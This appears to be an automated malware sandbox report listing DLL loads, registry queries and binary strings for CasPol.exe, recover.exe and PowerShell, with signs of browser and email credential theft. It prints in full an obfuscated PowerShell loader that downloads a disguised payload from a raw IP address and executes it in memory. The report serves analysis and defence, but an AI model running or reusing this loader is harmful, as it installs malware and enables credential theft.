                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: pstorec.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: pstorec.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib
                        Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.iofilesectiondnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsig source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrow source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrowdnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2 source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
